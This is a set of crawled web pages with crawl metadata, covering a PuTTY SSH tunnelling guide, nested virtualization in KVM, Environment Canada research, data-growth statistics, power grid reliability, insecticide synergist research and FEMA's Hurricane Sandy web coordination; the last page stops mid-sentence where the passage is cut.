<urn:uuid:31ac2436-e89a-4856-9731-23959913a149>
CC-MAIN-2017-04
http://www.networkworld.com/article/2225579/microsoft-subnet/most-parents-allow-unsupervised-internet-access-to-children-at-age-8.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00537-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958221
1,226
2.96875
3
Create your own Virtual Private Network for SSH with Putty I have multiple Linux machines at my home. Previously, when I needed SSH access to these machines I used to setup port forwarding on my router to each of these machines. It was a tedious process of enabling port forwarding and then disabling it after use. It was also difficult to remember port number forwarded for a particular machine. But now I found a cooler way to get SSH access to all my machines at home without setting up port forwarding or remembering any port numbers and most importantly, I can address my home machines with local subnet IP address, no matter wherever I connect from the internet. - Remote machine with Putty installed in it. - Home router’s internet accessible IP address or dynamic DNS (DDNS) address. - One/more Linux/Windows machine(s) to which direct SSH access is required. - On the router, port forwarding is enabled for SSH service to at least one of these machines. The basic idea to get this working is that we make one initial SSH connection to our home machine. Then using this connection as a tunnel we can connect to any machines at home by addressing them with local sub-network address (such as 192.168.x.x). So the high level steps are: - Open a putty session and configure it to act as a tunnel. - From this session connect to your default SSH server at home. - Open another putty session and configure it use the previous putty session as proxy. - SSH connect to any machine at home using the local subnet IP address. Since we are using a proxy it will resolve the local subnet’s IP address properly. - You can make any number of connections to all your home machines by just repeating steps (3) and (4). Note: If on the remote network’s subnet is same as your home network’s subnet then you might run into IP conflicts. 1) On the remote system, open putty enter the IP address or dynamic DNS (DDNS) name in the host name field. Select “SSH” as connection type. Port 22 will be selected which can be left alone unless you run the SSH service on a different port. Note: Though your putty screen might look a little different than the one seen here due to version differences, the basic steps would be still the same In our example, Host Name = demo123.dyndns.org 2) In putty, on the left-hand navigation panel, open SSH option and select “Tunnels”. In the tunnels screen, set these values Source Port: 3000 (this is the port at which our proxy service listens to, this port can be changed to any but preferably a number larger than 1024) Destination Port: (Leave Blank) Finally, select “Dynamic” from the radio button options. 3) Important: Click “Add” to add the tunnel settings to the connection. 4) On left-hand navigation panel, move the scrollbar to the top and click session. You will be seeing the settings entered in step(1). Now we can save the whole connection settings. Add a name for this connection in the saved sessions textbox and click save. 5) Click open, to open connection to home machine, and enter login and password information for the remote machine. This user need not be root user, but it needs to be an user with network access on the remote machine. That brings to the end of putty configuration. Now you have a proxy tunnel connection from remote machine to one of the home machine. Now we are ready to connect to any home machine. 6) Open another putty session. Select the options “Proxy” from the navigation panel. On the right-side proxy options, enter only the following information. Don’t change any other settings. Proxy type : select “SOCKS 4” Proxy hostname : enter “localhost” Port : 3000 7) Click on the “Session” option from the navigation panel. Enter a name under “Saved Sessions” text field. Don’t enter any information in the “Host Name” field. Now click “Save”. Now we have a template connection session using our proxy. 8 ) Now enter local subnet IP address of a machine at home and click open. The connection gets routed through the proxy tunnel and you will be connected to the home machine directly. Similarly you can connect to another home machine by opening putty and loading the template we created and just filling in the machine’s local subnet IP address. BTW, if you think just SSH access is not cool enough, you can do more cool stuff like - Listening to music stored at home - Viewing/sharing photos at with friends and family - Creating schedules, Todos, notes etc., securely at a home computer
<urn:uuid:a723f710-b96b-4e0b-b3b3-9d274071c656>
CC-MAIN-2017-04
https://www.getfilecloud.com/blog/create-your-own-virtual-private-network-for-ssh-with-putty/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00473-ip-10-171-10-70.ec2.internal.warc.gz
en
0.864558
1,043
2.546875
3
Ten years ago, when the topic of the "cloud" was first being introduced, the focus was on simple services within a public infrastructure. But as is typical in technology, these services evolve with their use models. Similarly, the introduction of virtualization on commodity hardware also focused on the simplest usage models, but then evolved as the potential was better understood. As hardware providers saw the growth of virtualization and the cloud, they also evolved their offerings to more efficiently support the needs. Early x86 processors were not ideal for virtualization, but processor internals have focused on these new usage models and created a more efficient environment for platform virtualization. Let's begin with a short introduction to cloud architectures and some of the limitations they bring. Public cloud architectures Public clouds, or publicly available virtualized infrastructure, are focused on the simple allocation of virtual servers as carved out by a hypervisor for multitenant use. The hypervisor acts as a multiplexer, making a physical platform shareable among multiple users. Multiple offerings are available for hypervisors, from the Kernel Virtual Machine (KVM) to the Xen hypervisor and many others. One limitation that exists within virtualized infrastructures is their dependence on a given virtual environment. Amazon Elastic Compute Cloud (Amazon EC2), for example, relies on Xen virtualization. Amazon EC2 expects that any guests that run within its infrastructure will be packaged in a specific way called the Amazon Machine Image (AMI) format. The AMI is the fundamental unit of deployment within Amazon EC2 and can be one of many preconfigured types (based on operating system and application set) or a custom creation with some additional effort. This virtual machine (VM) format (which consists of metadata and a virtual disk format) can be an obstacle for cloud users. The ability to migrate VMs from private infrastructure to public infrastructure or between public cloud infrastructures is obstructed by this format and dependence on the target's hypervisor choice. Therefore, support for nested virtualization creates a new abstraction for cloud users. If clouds support the ability to virtualize a hypervisor on top of another hypervisor, then the VM format becomes irrelevant to the cloud. The only dependence is the format of the guest hypervisor itself. This change evolves first-generation clouds from one-size-fits-all propositions into highly flexible virtualized infrastructures with greater freedom for its users. Figure 1 illustrates the new abstraction in the context of virtual platforms for hypervisors, not just VMs. Note in this figure the nomenclature for the levels of virtualization: L0 represents the bare-metal hypervisor, L1 the guest hypervisors, and L2 the guest VMs. Figure 1. Simple illustration of traditional hypervisors vs. nesting hypervisors This change creates the ability not simply to package VMs for new infrastructures but to package sets of VMs with their hypervisor, simplifying the ability for users of private cloud infrastructures to migrate functionality (either statically or dynamically) to public cloud infrastructure. This change is shown in Figure 2, with the translation of the private hypervisor into the guest hypervisor in the nested cloud. Figure 2. Guest hypervisor and host hypervisors in the nested cloud Next-generation clouds: Introducing nested virtualization Nested virtualization is not a new concept but one that has been implemented for some time in the IBM® z/VM® hypervisor. The IBM System z® operating system is itself a hypervisor that virtualizes not just processors and memory but also storage, networking hardware assists, and other resources. The z/VM hypervisor represents the first implementation of practical nested virtualization with hardware assists for performance. Further, the z/VM hypervisor supports any depth of nesting of VMs (with additional overhead, of course). More recently, x86 platforms have been driven toward virtualization assists based on the growing usage models for the technique. The first hypervisor for commodity hardware to implement nested virtualization was the KVM. This addition to KVM was performed under IBM's Turtles project and permitted multiple unmodified hypervisors to run on top of KVM (itself a hypervisor as a tweak of the Linux® kernel). The Turtles project was motivated in part by a desire to use commodity hardware in a way that IBM pioneered for IBM System p® and System z operating systems. In this model, the server runs an embedded hypervisor and allows the user to run the hypervisor of his or her choice on top of it. The approach has gained interest from the virtualization community, as the capabilities (modifications to KVM) are now part of the mainline Linux kernel. Architecture for nested virtualization Nested virtualization introduces some unique problems not seen before. Let's explore some of these issues and how they've been addressed within KVM. A disadvantage to current virtualization support in processor architectures is the focus on dual-level virtualization (VMs stacked on a single hypervisor). Turtles stretches this support through the simple process of multiplexing. Recall from Figure 1 that three levels exist (L0 as the host hypervisor, L1 as the guest hypervisor, and L2 as the guest VM). With today's processors, L0 and L1 are efficiently handled, but efficiency is lost at L2. Rather than maintaining this strict stacking, Turtles multiplexes entities at L1 and in essence allows the host hypervisor to multiplex the guest hypervisor and guest VMs at L1. Therefore, rather than virtualizing the virtualization instructions, the hardware assists available in the processor are used efficiently to support the three layers (see Figure 3). Figure 3. Multiplexing guests on the host (L0) hypervisor But exploiting the virtualization assets of the processor was not the only obstacle. Let's explore some of the other issues and their solutions within KVM. Nested virtualization introduces some interesting problems in this space. Note that traditional virtualization partly addresses the instruction set, directly executing certain instructions on the processor and emulating others through traps. In nested virtualization, another level is introduced at which certain instructions continue to execute directly on hardware and others are trapped but managed in one layer or another (with the overhead of transitioning between the layers). This setup has exposed strengths and weaknesses in the processor implementations of virtualization, as the Turtles project found. One such area was management of VM control structures (VMCSs). In Intel's implementation, reading and writing these structures involves privileged instructions that require multiple exits and entries across the layers of the nested stack. These transitions introduce overhead, which is expressed as loss of performance. AMD's implementation manages VMCS through regular memory reads and writes, which means that when a guest hypervisor (L1) modifies a guest VM's VMCS (L2), the host hypervisor (L0) is not required to intervene. Without processor support for nesting, the Turtles approach to multiplexing also minimizes transitions between layers. Transitions in virtualization occur through special instructions to enter or exit VMs ( VMentry) and are expensive. Certain exits require that the L1 hypervisor be involved, but other conditions (such as external interrupts) are handled solely by L0. Minimizing some of the transitions from L2 to L0 to L1 results in improved performance. MMU and memory virtualization Prior to page table assists in modern processors, hypervisors emulated the behavior of the memory management unit (MMU). Guest VMs created guest page tables to support their translation of guest virtual addresses into guest physical addresses. The hypervisor maintained shadow page tables to translate guest physical addresses into host physical addresses. All of this required trapping changes to the page tables so that the hypervisor could manage the physical tables in the CPU. Intel and AMD solved this issue through the addition of two-dimensional page tables called extended page tables (EPTs) by Intel and nested page tables (NPTs) by AMD. These assists allow the secondary page tables to translate guest physical addresses to host physical addresses (while the traditional page tables continue to support guest virtual-to-guest physical translation). The Turtles project introduced three models to deal with nesting. The first and least efficient is the use of shadow page tables on top of shadow page tables. This option is used only when hardware assists are not available where both the guest and host hypervisor maintain the shadow tables. The second method uses shadow tables over the two-dimensional page tables, which are managed by L0. Although more efficient, page faults in the guest VM result in multiple L1 exits and overhead. The final method virtualizes the two-dimensional page tables for the L1 hypervisor. By emulating the secondary page tables in L1 (where L0 uses the physical EPT/NPT), there are fewer L1 exits and less overhead. This innovation from the Turtles project was called multidimensional paging. I/O device virtualization Virtualizing I/O devices can be one of the most costly aspects of virtualization. Emulation (as provided by QEMU) is the costliest, where approaches like paravirtualization (making the guest aware and coordinating I/O with the hypervisor) can improve overall performance. The most efficient scheme uses hardware assists such as the AMD I/O MMU (IOMMU) to provide transparent translation of guest physical addresses to host physical addresses (for operations such as direct memory access [DMA]). The Turtles project improved performance by giving the L2 guest direct access to the physical devices available to L0. The L0 host hypervisor emulates an IOMMU for the L1 guest hypervisor. This approach minimizes guest exits, resulting in reduced overhead and improved performance. Nesting within KVM has found negligible overhead depending on use model. Workloads that drive VM exits (such as external interrupt processing) tend to be the worst offenders, but the optimizations within KVM result in 6% to 14% overhead. This overhead is certainly reasonable given the new capabilities that nested virtualization provides. Advancements in processor architectures will likely improve on this further. Where can you find nested virtualization? Today, a number of hypervisors support nested virtualization, though not as efficiently as they could. The Linux KVM supports nesting on recent virtualization-enabled processors. The Xen hypervisor has also been modified to support nested virtualization, so the open source community has quickly moved to adopt this capability and its potential usage models. From a production standpoint, it's safe to say that this capability is in the early stages of development. In addition, scaling virtualization with nesting implies heavier loading on the physical host and therefore should use servers with more capable processors. Note also that it's possible to perform nested virtualization in other contexts. In a recent OpenStack article, nesting was demonstrated using VirtualBox as the host hypervisor and QEMU (providing emulation) as the guest. Although not the most efficient configuration, the article demonstrates the basic capability on more modest hardware. See Resources for more details. A hypervisor as a standard portion in firmware on a desktop or server may be commonplace in the future. This usage model implies that the embedded hypervisor can support an operating system (as a VM) or another hypervisor of the user's choice. The user of a hypervisor in this fashion also supports new security models (as the hypervisor exists underneath the user's and the hacker's code). This concept was originally used for nefarious purposes. The "Blue Pill" rootkit was an exploit from Joanna Rutkowska that inserted a thin hypervisor underneath a running instance of an operating system. Rutkowska also developed a technique called Red Pill that could be used to detect when a "Blue Pill" was inserted below a running operating system. The Turtles project proved that nested virtualization of hypervisors was not only possible but efficient under many conditions, using the KVM hypervisor as a test bed. Work has continued with KVM, and it is now a model for the implementation of nesting within a hypervisor, supporting the execution of multiple guest hypervisors simultaneously. As processor architectures catch up with these new requirements, nested virtualization could be a common usage model in the future, not only in enterprise servers in next-generation cloud offerings but on commodity servers and desktops. - The Turtles Project: Design and Implementation of Nested Virtualization is a useful read on how IBM Research Haifa and the IBM Linux Technology Center modified and optimized the KVM to support nested virtualization. Also interesting is the OSDI Presentation on Turtles. - The paper Architecture of Virtual Machines by R. P. Goldberg was one of the earliest definitions of recursive VMs. This transcript is quite old (from 1973) but well worth a read. - Blue Pill and Red Pill were introduced by Joanna Rutkowska in 2006. Blue Pill was a malware approach to inserting a thin hypervisor underneath a running operating system as a rootkit. The source code to Blue Pill has never been publicly released. - The Linux KVM was the first hypervisor to be mainlined into the Linux kernel. KVM is an efficient, production-quality hypervisor that is widely used in the virtualization community. You can learn more about KVM in Discover the Linux Kernel Virtual Machine (M. Tim Jones, developerWorks, April 2007). - As another demonstration of the flexibility of the Linux kernel, the modifications for KVM translate Linux from a desktop and server kernel into a full-featured hypervisor. Learn more in Anatomy of a Linux hypervisor (M. Tim Jones, developerWorks, May 2009). - OpenStack is an Infrastructure as a Service cloud offering that takes advantage of nested virtualization. In the article Cloud computing and storage with OpenStack you can see a demonstration of nested virtualization with emulation (running QEMU on VirtualBox). - In the developerWorks cloud developer resources, discover and share knowledge and experience of application and services developers building their projects for cloud deployment. - Follow developerWorks on Twitter. You can also follow this author on Twitter at M. Tim Jones. - Watch developerWorks demos ranging from product installation and setup demos for beginners to advanced functionality for experienced developers. Get products and technologies - See the product images available for IBM SmartCloud Enterprise. - Evaluate IBM products in the way that suits you best: Download a product trial, try a product online, use a product in a cloud environment, or spend a few hours in the SOA Sandbox learning how to implement service-oriented architecture efficiently. - Get involved in the developerWorks community. Connect with other developerWorks users while exploring the developer-driven blogs, forums, groups, and wikis. Dig deeper into Cloud computing on developerWorks Exclusive tools to build your next great app. Learn more. Crazy about Cloud? Sign up for our monthly newsletter and the latest cloud news. Deploy public cloud instances in as few as 5 minutes. Try the SoftLayer public cloud instance for one month.
<urn:uuid:4f0375a0-fca1-422c-b4a4-aee19fc3b827>
CC-MAIN-2017-04
http://www.ibm.com/developerworks/cloud/library/cl-nestedvirtualization/index.html?ca=drs-
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00289-ip-10-171-10-70.ec2.internal.warc.gz
en
0.921879
3,106
2.890625
3
Environment Canada , legally incorporated as the Department of the Environment under the Department of the Environment Act , is the department of the Government of Canada with responsibility for coordinating environmental policies and programs as well as preserving and enhancing the natural environment and renewable resources. The powers, duties and functions of the Minister of the Environment extend to and include matters relating to: "preserve and enhance the quality of the natural environment, including water, air, soil, flora and fauna; conserve Canada's renewable resources; conserve and protect Canada's water resources;forecast daily weather conditions and warnings, and provide detailed meteorological information to all of Canada; enforce rules relating to boundary waters; and coordinate environmental policies and programs for the federal government."Its ministerial headquarters is located in les Terrasses de la Chaudière, Gatineau, Quebec.Under the Canadian Environmental Protection Act , Environment Canada became the lead federal department to ensure the cleanup of hazardous waste and oil spills for which the government is responsible, and to provide technical assistance to other jurisdictions and the private sector as required. The department is also responsible for international environmental issues . CEPA was the central piece of Canada's environmental legislation but was replaced when budget implementation bill entered into effect in June 2012.Under the Constitution of Canada, responsibility for environmental management in Canada is a shared responsibility between the federal government and provincial/territorial governments. For example, provincial governments have primary authority for resource management including permitting industrial waste discharges . The federal government is responsible for the management of toxic substances in the country . Environment Canada provides stewardship of the Environmental Choice Program, which provides consumers with an eco-labelling for products manufactured within Canada or services that meet international label standards of Global Ecolabelling Network.Environment Canada continues to undergo a structural transformation to centralize authority and decision-making, and to standardize policy implementation. Wikipedia. Dempsey F.,Environment Canada Bulletin of the American Meteorological Society | Year: 2013 Frank Dempsey suggests that various remote-sensing, analysis, and forecasting methods allow anticipation of the harmful increases in airborne fine particulates and ozone pollution caused by the plumes of distant fires. The recognition and forecasting of trajectories of smoke plumes from active fire will be beneficial for anticipating and predicting potential effects on air quality in eastern North America. A case highlights a case where distinct increases in concentrations of fine particles and O3closely correlated with the plume from a distant wildfire, have been observed in routinely collected air quality observations in Ontario's air monitoring network. The specific data that indicate detection of smoke from northern sources are the air quality observations from various locations in southern Ontario. Several more examples have also been presented to demonstrate the benefits of recognition and forecasting of trajectories of smoke plumes in anticipating and predicting potential effects on air quality. Source Reiner E.J.,Environment Canada Mass Spectrometry Reviews | Year: 2010 The analysis of polychlorinated dibenzo-p-dioxins, polychlorinated dibenzofurans, polychlorinated biphenyls, and other related compounds requires complex sample preparation and analytical procedures using highly sensitive and selective stateof-the-art instrumentation to meet very stringent data quality objectives. The analytical procedures (extraction, sample preparation), instrumentation (chromatographic separation and detection by mass spectrometry) and screening techniques for the determination of dioxins, furans, dioxin-like polychlorinated biphenyls and related compounds with a focus on new approaches and alternate techniques to standard regulatory methods are reviewed. © 2009 Wiley Periodicals, Inc.,. Source Boer G.J.,Environment Canada Climate Dynamics | Year: 2011 Decadal prediction of the coupled climate system is potentially possible given enough information and knowledge. Predictability will reside in both externally forced and in long timescale internally generated variability. The "potential predictability" investigated here is characterized by the fraction of the total variability accounted for by these two components in the presence of short-timescale unpredictable "noise" variability. Potential predictability is not a classical measure of predictability nor a measure of forecast skill but it does identify regions where long timescale variability is an appreciable fraction of the total and hence where prediction on these scale may be possible. A multi-model estimate of the potential predictability variance fraction (ppvf) as it evolves through the first part of the twenty-first century is obtained using simulation data from the CMIP3 archive. Two estimates of potential predictability are used which depend on the treatment of the forced component. The multi-decadal estimate considers the magnitude of the forced component as the change from the beginning of the century and so becomes largely a measure of climate change as the century progresses. The next-decade estimate considers the change in the forced component from the past decade and so is more pertinent to an actual forecast for the next decade. Long timescale internally generated variability provides additional potential predictability beyond that of the forced component. The ppvf may be expressed in terms of a signal-to-noise ratio and takes on values between 0 and 1. The largest values of the ppvf for temperature are found over tropical and mid-latitude oceans, with the exception of the equatorial Pacific, and some but not all tropical land areas. Overall the potential predictability for temperature generally declines with latitude and is relatively low over mid- to high-latitude land. Potential predictability for precipitation is generally low and due almost entirely to the forced component and then mainly at high latitudes. To the extent that the multi-model ppvf reflects both the behaviour of the actual climate system and the possibility of decadal prediction, the results give some indication as to where and to what extent decadal forecasts might be possible. © 2010 Her Majesty the Queen in Right of Canada. Source Environment Canada | Date: 2011-06-08 Skimmers, barges and related methods recover heavy oil or bitumen from contaminated water environments such as tailings ponds. The skimmer has an articulated mesh-like conveyor driven around a drum by a drive sprocket. A pusher mechanism discharges bitumen or heavy oil from cavities in the conveyor. In one embodiment, the skimmer includes an automatic depth control system. In other embodiments, knife-edged shear plates remove heavy oil or bitumen adhering to the conveyor and drum. A barge may incorporate multiple parallel skimmers. The barge may include a bitumen-transfer pump having an annular fluid-injection flange that generates an annulus of lubricating fluid inside a discharge hose. A method of skimming heavy oil or bitumen involves using a skimmer that automatically adjusts its elevation or depth based on a control signal generated by a depth sensor. Another method recovers and transfers bitumen by lubricating the discharge hose using the annular fluid-injection flange. Environment Canada | Date: 2012-10-16 Provided are decontamination compositions that include an ammonium compound, a ferric/ferrocyanide compound, a polyaminocarboxylic acid compound and a polycarboxylic compound. Depending on the mode of application, the compositions can be used as foams, liquids, gels, strippable coatings, mists, or in other forms. Also provided are kits that include such components in whole or in part along with an optional dispersing device for use of the decontamination composition.
<urn:uuid:e96ba8ba-f8c3-4ad0-8aa4-d9fb3933ddc1>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/environment-canada-55213/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00289-ip-10-171-10-70.ec2.internal.warc.gz
en
0.909998
1,523
3.6875
4
The Geography of the Digital Universe Although the bits of the digital universe may travel at Internet speeds around the globe, it is possible to assign a place of origin to them and chart the map of the digital universe. In this year’s study, for the first time, we have managed to determine where the information in the digital universe was either generated, first captured, or consumed. This geography of the digital universe maps to the users of the devices or applications that pump bits into the digital universe or pull bits into one’s own personal digital solar system for the purpose of consuming information — Internet users, digital TV watchers, structures hosting surveillance cameras, sensors on plant floors, and so on. In the early days, the digital universe was a developed world phenomenon, with 48% of the digital universe in 2005 springing forth from just the United States and Western Europe. Emerging markets accounted for less than 20%. However, the share of the digital universe attributable to emerging markets is up to 36% in 2012 and will be 62% by 2020. By then, China alone will generate 21% of the bit stream entering the digital universe. It stands to reason. Even though China accounts for only 11% of global GDP today, by 2020 it will account for 40% of the PCs, nearly 30% of smartphones, and nearly 30% of Internet users on the planet — not to mention 20% of the world population. At the same time, the money invested by the regions in creating, managing, and storing their portions of the digital universe will vary wildly — in real dollar terms and as a cost per gigabyte. This disparity in investment per gigabyte represents to some extent differing economic conditions — such as the cost of labor — and to some extent a difference in the types of information created, replicated, or consumed. The cost per gigabyte from bits generated by surveillance cameras will be different from the cost per gigabyte from bits generated by camera phones. However, to another extent, this disparity also represents differences in the sophistication of the underlying IT, content, and information industries — and may represent a challenge for emerging markets when it comes to managing, securing, and analyzing their respective portions of the digital universe. This might not be a major issue if the geography of the digital universe were as stable and fixed as, say, the geography of countries. However, bits created in one part of the physical world can easily find themselves elsewhere, and if they come with malware attached or leaky privacy protections, it’s a problem. The digital universe is like a digital commons, with all countries sharing some responsibility for it. The installed base of unused storage bits introduces an interesting geographic twist that establishes a new dynamic by which to understand our digital universe. While emerging markets may indeed grow as a percentage of the digital universe, remember that much of the digital universe is a result of massive consumption on mobile and personal devices, digital televisions, and cloud-connected applications on PCs. As ownership of smartphones and tablets (that have relatively low internal storage and rely heavily on consuming information from “the cloud") increases exponentially within emerging markets, information consumption grows at an even faster pace. Given the connected infrastructure of our digital universe, information does not need to (and in fact will not) reside within the region where the information is consumed. Hence, today’s well-running datacenters will continue to expand and to fulfill an increasing number of requests — both local and from halfway across the globe — for information.
<urn:uuid:c595549c-1ef8-4750-97e2-8df38af2f125>
CC-MAIN-2017-04
https://www.emc.com/leadership/digital-universe/2012iview/geography-of-the-digital-universe.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00437-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923077
715
2.984375
3
Another concern of the power grid comes from the lack of security. Just recently it was revealed that the energy grid has become vulnerable to attack. Coming from the recent declassification of a 2007 report from the National Academy of Sciences, the lack of a physical security has experts worried. Although the United States Federal Energy Regulatory Commission (FERC) has been assigned with creating a new security strategy through its nearly created office of Energy Infrastructure Security, the threat still exists. If attacked, experts warn that the power grid could suffer more damage than it did during Superstorm Sandy with the possibility of massive blackouts lasting weeks or even months at a time. While this knowledge has likely cause operators additional stress, one way to help alleviate the burden is to look at renewable resources— such as hydro, geothermal, solar and wind—for power. By using renewable resources, operators can take extra precaution to protect their campuses from future security risks regarding power sources. If hackers attack the power grid, operators will have a peace of mind knowing they can continue operations thanks to the innovative power supply. New Power Options To help alleviate the strain on the power grid, data center operators are finding new ways to gather power. As the risks increase, no longer can they rely solely on the power of their host country and supplemental power is becoming vital. With demand for energy at an all-time high it’s crucial to ensure the power stays on even as the grid stretches to capacity. As a result of the pressure from the weakening grid, data centers have begun to utilize renewable resources harvested from their surroundings. According to the National Renewable Energy Laboratory, data centers across the country can utilize renewable energy technologies, but some technology solutions are better suited for select geographical locations. Although the United States offers suitable locations, some companies have started venturing outside their home countries for stronger solutions. Large enterprises, such as BMW, Facebook and Google have begun to move data center operations abroad to Iceland, Sweden and Finland, respectively. Attracted by the cool climates and relatively low pricing, these artic campuses are allowing operators to harvest renewable resources from their host countries for both power and cooling. With that, site selection plays the ultimate role in determining whether alternative technology can be accessed. As an added benefit, by gathering energy from the host country via renewables, data centers can control pricing and lower customer’s carbon footprint. Facebook’s facility in Sweden will require 70 percent less power than traditional data centers, while BMW’s move to Icelandic facility will save it around 3,600 metric tons of carbon emissions per year. Furthermore, the campuses will no longer be restricted to only utilizing their host countries power grid. Instead, their ability to gather power with renewable resources will lessen the unease and anxiety suffered by data center operators. Without being bound solely to the host countries power, data centers can remain online even if disaster strikes. While no one expects the power grid to fail completely, high-power users can and should expect to make lasting changes to how they collect their power. By utilizing alternative technology, data center operators can rest easy knowing their systems will remain online at all times, even during storms as severe as Sandy. Though the aging infrastructure and lack of security will continue to plague the grid, operators can begin to change their responses by taking action and thinking outside the box. Industry Perspectives is a content channel at Data Center Knowledge highlighting thought leadership in the data center arena. See our guidelines and submission process for information on participating. View previously published Industry Perspectives in our Knowledge Library. Pages: 1 2
<urn:uuid:a84e8239-2a0c-4940-8e4d-67962f542c94>
CC-MAIN-2017-04
http://www.datacenterknowledge.com/archives/2013/01/16/us-power-grid-has-issues-with-reliability/2/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00555-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942782
722
3.03125
3
It’s finally happened: social media has risen to the top of our everyday terminology. The New Oxford American Dictionary just announced “unfriend” as its 2009 Word of the Year. That’s right: unfriend (verb) “To remove someone as a ‘friend’ on a social networking site such as Facebook.” Other Internet/technology words considered this year include hashtag, netbook and paywall, as well as Twitt, Tweeple and other common Twitter terms. Check out the full list here. Also big news is the new worldwide campaign to nominate the net for the Nobel Peace Prize in 2010. Wired magazine reports on “Internet for Peace”, launched last week by Wired Italy: “The internet can be considered the first weapon of mass construction, which we can deploy to destroy hate and conflict and to propagate peace and democracy,” said Riccardo Luna, editor-in-chief of the Italian edition of Wired magazine. “What happened in Iran after the latest election, and the role the web played in spreading information that would otherwise have been censored, are only the newest examples of how the internet can become a weapon of global hope.” For more info or to sign the petition, go to Internet for Peace. In case you’re looking for more random thoughts and interesting tidbits for Monday, see these: - The Funny and Bizarre World of Client Requests – from Inspect Element (via Smashing Magazine) - Behold, The Future! – from woot! Have something to share? Send it to us!
<urn:uuid:638ab658-e632-4862-b966-afdb1a178e7f>
CC-MAIN-2017-04
http://www.codero.com/blog/monday-miscellany-unfriend-internet-for-nobel-and-more/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00373-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928764
335
2.625
3
Agency: Cordis | Branch: FP7 | Program: BSG-SME | Phase: SME-2013-1 | Award Amount: 1.32M | Year: 2013 Insect pests cause significant damage to agricultural crops and transmit several important diseases of humans and animals. Chemical insecticides have been used to control insect pests for many decades and remain essential to ensure a supply of affordable food and as part of disease vector control for the foreseeable future. Unfortunately, the world-wide use of synthetic insecticides over many years has led to increased resistance to insecticides and contributed to environmental contamination. One way to reduce insecticide use without compromising control is to use a synergist in combination with an insecticide. Synergists are themselves nontoxic but act by increasing the effectiveness of the insecticides they are used with. They do this by inhibiting the metabolic systems in insects that detoxify insecticides. The goal of this project is to develop ecofriendly synergists for use in formulations with insecticides, both in agriculture and in Public Health, enabling a reduction in the amount of insecticidal active applied, and thereby reducing the adverse effects of these insecticides on beneficial insects such as bees. On the basis of in-depth experimental analyses of the interactions of the known synergist piperonyl butoxide with metabolic enzymes in pest insects, new molecular structures will be designed, synthesized and evaluated on pest and beneficial species using laboratory bioassays and field trials. In addition, the synthesis process to manufacture these synergists will be evaluated with the aim of achieving an industrially and economically feasible process. Finally strategies will be developed that use the novel synergists to enhance the control of insect pests while preserving beneficial insects. As such this research has significant scientific, economic, and social impact as part of sustainable food production and disease control and will enhance the partners competitiveness in this important industry by means of global patent and license agreements.
<urn:uuid:fd39f716-6b51-4bab-9be8-8ef73fb8bf60>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/endura-spa-2155395/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00097-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937975
388
2.65625
3
With its satellites, scanners and links to local officials, the federal government is often the best source for trusted information during a hurricane, tornado or other natural disaster. Just having important information doesn’t mean much, though, if the public can’t find it or is too confused to do anything with the information once it does have it. That’s a lesson officials learned during Hurricane Katrina when “separate websites were used to share information for evacuees, friends, and families and to publish lists of names” and “so many websites sprang up that it became difficult to find the specific website for the information, resources, or reconnection one needed,” according to a lessons learned report on social media and Hurricane Sandy published by the Homeland Security Department last week. When Sandy pummeled the Northeast in October 2012, the Federal Emergency Management Agency did it’s best to ensure the government was speaking with a single online voice. That’s easier said than done, though, as the report shows. The detailed description from the report of how FEMA, the General Services Administration and other agencies corralled Sandy information is below. Note that a single and authoritative source of government information is still a ways off but there’s now only one site, at USA.gov, that’s aggregating information from across government. FEMA and Federal Sandy Website Standardization On October 31, 2012, the web manager for FEMA issued guidance to all U.S. government agency websites (per Emergency Support Function 15 of the National Response Framework). In this guidance, FEMA requested four things: Creation of a www.[agency].gov/sandy landing page on their respective site. On this page, agencies were requested to place information only FROM THEIR AGENCIES (to stay in their “lane” of communication) and to not cross-post information from other agencies. If one agency had information that would be appropriate to place on another agencies website, the agency Web managers were asked to coordinate directly. A request to create a URL for both English and Spanish content (if appropriate) was also made. Once the www.[agency].gov/sandy landing page was created, the agencies were asked to notify the USA.gov web manager at the U.S. General Services Administration (GSA) that the page was active and provide under which general “lane” of information the page fell: - Health and Safety; - How to Get Help; - Find Friends and Family; - Donate/Volunteer; and - What the Government is Doing. Once the USA.gov/sandy page was created, all agencies were then encouraged to cross-link from their agency homepage and their www.[agency].gov/sandy page back to the www.USA.gov/sandy page and/or embed the USA.gov Hurricane Sandy widget on their agency websites. Once the www.[agency].gov/sandy pages were created, FEMA also requested that all agencies notify the FEMA web manager of the page status and also include whether or not the following information was included on the page: - Situation reports; - Blog posts; - Press releases; - Safety/recovery tips; and - Other (details). This information was then shared with FEMA’s Strategic Communications Division within the Office of External Affairs. The goal of this effort was to drive visitors looking for Sandy information back to one authoritative source for information. FEMA, working with GSA, consolidated all U.S. government Web content related to Sandy onto www.USA.gov/sandy, with specific relief and recovery information being consolidated onto www.FEMA.gov/sandy. A widget was then created that directed the public to the five identified lanes of communication (identified above) on USA.gov. From October 22 through December 31, 2012, the Hurricane Sandy page on USA.gov was viewed over 71,000 times, with the Hurricane Sandy widget being viewed over 2.8 million times. The Spanish version of the page was viewed over 3,600 times and the Spanish widget was viewed over 10,000 times. FEMA’s Sandy Landing Page On the www.FEMA.gov/sandy landing page, FEMA provided all of the specific relief, response and recovery information related to Sandy. Information for disaster survivors included how to get immediate help, how to locate a shelter, how to locate a FEMA 